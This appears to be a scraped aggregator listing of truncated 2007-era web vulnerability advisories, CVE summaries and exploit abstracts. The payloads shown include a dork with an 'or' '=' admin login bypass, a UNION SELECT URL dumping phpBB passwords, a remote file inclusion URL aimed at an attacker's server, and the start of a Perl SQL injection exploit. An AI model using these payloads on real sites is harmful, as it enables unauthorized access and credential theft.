admentor-sql.txt

AdMentor banners admin SQL injection By : sn0oPy Risk : high Site : http://www.aspcode.net/products/admentor Dork : inurl:"admentor/admin" exploit : UserID = 'or' '=' Password = 'or' '=' contact : [email protected] greetz : subzero, Avg Teamhttp://forums.avenir-geopolitique.net. references :...

AdMentor (banners) admin SQL injection

AdMentor banners admin SQL injection By : sn0oPy Risk : high Site : http://www.aspcode.net/products/admentor Dork : inurl:"admentor/admin" exploit : UserID = 'or' '=' Password = 'or' '=' contact : [email protected] greetz : subzero, Avg Teamhttp://forums.avenir-geopolitique.net. references :...

Virtual Host Administrator Modules_Dir远程文件包含漏洞

Virtual Host Administrator是一款基于PHP的WEB应用程序。 Virtual Host Administrator不正确过滤用户提交的输入，远程攻击者可以利用漏洞以WEB权限执行任意命令。 问题是'main.php'脚本对用户提交的'MODULESDIR'参数缺少过滤，指定远程服务器上的文件作为包含参数，可导致以WEB权限执行任意命令。 Inter7 vhostadmin 0.1 目前没有解决方案提供： http://www.inter7.com/index.php?page=vhostadmin...

CVE-2007-0486

Multiple PHP remote file inclusion vulnerabilities in Openads aka phpAdsNew 2.0.7 allow remote attackers to execute arbitrary PHP code via a URL in the 1 phpAdsgeoPlugin parameter to libraries/lib-remotehost.inc, the 2 filename parameter to admin/report-index, or the 3 phpAdsconfigmyfooter...

CVE-2007-0400

Cross-site scripting XSS vulnerability in admin/memberlist.php in Easebay Resources Login Manager 3.0 allows remote attackers to inject arbitrary web script or HTML via the keyword parameter...

CVE-2007-0400

CVE-2007-0400 is an XSS vulnerability in the admin/memberlist.php of the Easebay Resources Login Manager 3.0. The flaw allows remote attackers to inject arbitrary web script or HTML via the keyword parameter, potentially compromising user sessions or browser contexts. The NVD entry lists a CVSSv2...

CVE-2007-0401

The CVE-2007-0401 entry affects Easebay Resources Login Manager 3.0, specifically the admin/memberlist.php component. The vulnerability is an SQL injection via the init_row parameter, allowing remote attackers to execute arbitrary SQL commands. The linked documents do not provide explicit exploit...

CVE-2007-0402

CVE-2007-0402 describes a cross-site scripting (XSS) vulnerability in the Admin module: admin/edit_member.php of Easebay Resources Paypal Subscription Manager. The issue allows remote attackers to inject arbitrary web script or HTML through the username parameter. The vulnerability is documented ...

CVE-2007-0261

snews.php in sNews 1.5.30 and earlier does not properly exit when authentication fails, which allows remote attackers to perform unauthorized administrative actions, as demonstrated by changing an administrative password via the changeup task, and by uploading PHP code via the imagefile parameter...

AllMyGuests远程文件包含漏洞

AllMyGuests是一款基于PHP的WEB应用程序。 AllMyGuests不正确过滤用户提交的输入，远程攻击者可以利用漏洞以WEB权限执行任意命令。 问题是多个脚本对用户提交的'AMGserverpath'参数缺少过滤，指定远程服务器上的文件作为包含参数，可导致以WEB权限执行任意命令。 AllMyPHP AllMyGuests 0.3 目前没有解决方案提供： http://www.php-resource.net/content-12.html http://example.com/include/submit.inc.php?AMGserverpath=attacker's...

createauction-rfi.txt

============================ HItamputih Crew ==================== hitamputih Advisory Discovered By : IbnuSina ----------------------------------------------------------- Software: createauction Script : http://www.scriptaty.net/magic-photo-storage-website.html Method: file inclusion Thanks To :...

CVE-2007-0205

CVE-2007-0205 is a directory traversal vulnerability in the admin/skins.php module of @lex Guestbook 4.0.2 and earlier. Attackers can create files in arbitrary directories by supplying . . sequences in the aj_skin and skin_edit parameters, which can enable file inclusion by placing a skin file in...

magic photo storage website Multiple Remote File Inclusion

============================ HItamputih Crew ==================== hitamputih Advisory Discovered By : IbnuSina ----------------------------------------------------------- Software: createauction Script : http://www.scriptaty.net/magic-photo-storage-website.html Method: file inclusion Thanks To :...

PPC Search Engine 1.61 (INC) Multiple Remote File Include Vulnerabilities

Exploit for unknown platform in category web applications ========================================================================= PPC Search Engine 1.61 INC Multiple Remote File Include Vulnerabilities =========================================================================...

AllMyGuests <= 0.3.0 (AMG_serverpath) Remote Inclusion Vulnerabilities

No description provided by source. AllMyGuests 3.0 Remote File Inclusion Vulnerability Software: AllMyGuests Version: 3.0 Download: http://download.php-resource.net/AllMyGuests/AllMyGuests0.3.0.zip Found By: beks Bug In: /include/submit.inc.php /admin/index.php /include/cmsubmit.inc.php...

Vizayn Haber (haberdetay.asp id variable) SQL Injection Vulnerability

No description provided by source. Vizayn Haber tr == tr SQL Injection Vulnerability Author : chernobiLe Site : www.cyber-sabotage.org , www.chernobiLe.com Contact: [email protected] Risk : High Download Link Of Vizayn Haber : http://aspindir.com/goster/4623 Exploit; Admin Nick, Passport,...

Acronym Mod v0.9.5 Remote SQL Injection Vulnerability

Acronym Mod v0.9.5 Remote SQL Injection Vulnerability Download: http://www.codemonkeyx.net Found By: the master exploit: http://Target/Path/admin/adminacronyms.php?mode=edit&id=-120UNION20SELECT20null,userpassword,null20FROM20phpbbusers20where20userid=2&sid=AdminHash Greetz: str0ke , Dr Max Virus...

Enthrallweb eJobs - newsdetail.asp SQL Injection

Enthrallweb eJobs - newsdetail.asp SQL Injection !/usr/bin/perl Script Name: Enthrallweb eJobs newsdetail.asp Remote SQL Injection Exploit Coded by : ajann Author : ajann Contact : : S.Page : http://www.enthrallweb.us $$ : 179.40 USD .. : ajann,Turkey use IO::Socket; if@ARGV newProto = "tcp",...

EternalMart Guestbook 1.10 (admin/auth.php) Remote Inclusion Vuln

No description provided by source. EternalMart Guestbook 1.1.0 emgbadminpath Remote File Include +class : Remote File Include Vulnerability +Author : mdx +Files : +admin/auth.php? +code : + + include"$emgbadminpath/authfunc.php"; + + download link :...

PHP Advanced Transfer Manager 1.30 - Source Code Disclosure

DEVIL TEAM IRC: irc.milw0rm.com:6667 devilteam http://www.rahim.webd.pl/ ======== Contact: [email protected] -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Greetings DragonHeart and all DEVIL TEAM Patriots : - Leito & Leon | friend str0ke ; Blund Coder, D0han, d3m0n...